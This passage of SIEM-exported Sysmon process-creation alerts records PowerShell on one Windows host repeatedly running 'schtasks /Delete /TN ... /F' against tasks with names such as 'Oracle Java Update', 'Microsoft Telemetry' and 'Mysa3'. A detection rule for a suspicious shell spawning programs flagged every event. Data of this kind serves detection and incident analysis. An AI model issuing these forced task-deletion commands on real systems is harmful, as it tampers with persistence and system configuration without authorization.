10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.197"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001024173100}"",""processId"":""5168"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.216",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.137 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00102c153100} +ProcessId: 7996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.143355400Z"",""eventRecordID"":""3935"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.137\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00102c153100}\r\nProcessId: 7996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.137"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00102c153100}"",""processId"":""7996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.202",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.089 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00108c133100} +ProcessId: 2312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.098504000Z"",""eventRecordID"":""3934"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.089\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00108c133100}\r\nProcessId: 2312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.089"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00108c133100}"",""processId"":""2312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.186",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.012 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001081113100} +ProcessId: 2772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.026282700Z"",""eventRecordID"":""3933"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.012\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001081113100}\r\nProcessId: 2772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.012"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001081113100}"",""processId"":""2772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.159",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.873 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010170f3100} +ProcessId: 6348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.914805200Z"",""eventRecordID"":""3932"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.873\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010170f3100}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.873"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010170f3100}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.140",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.768 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108f0c3100} +ProcessId: 7556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.773162600Z"",""eventRecordID"":""3931"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.768\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108f0c3100}\r\nProcessId: 7556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.768"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108f0c3100}"",""processId"":""7556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.650",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.695 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010ab0a3100} +ProcessId: 6716 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.730196300Z"",""eventRecordID"":""3930"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.695\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010ab0a3100}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 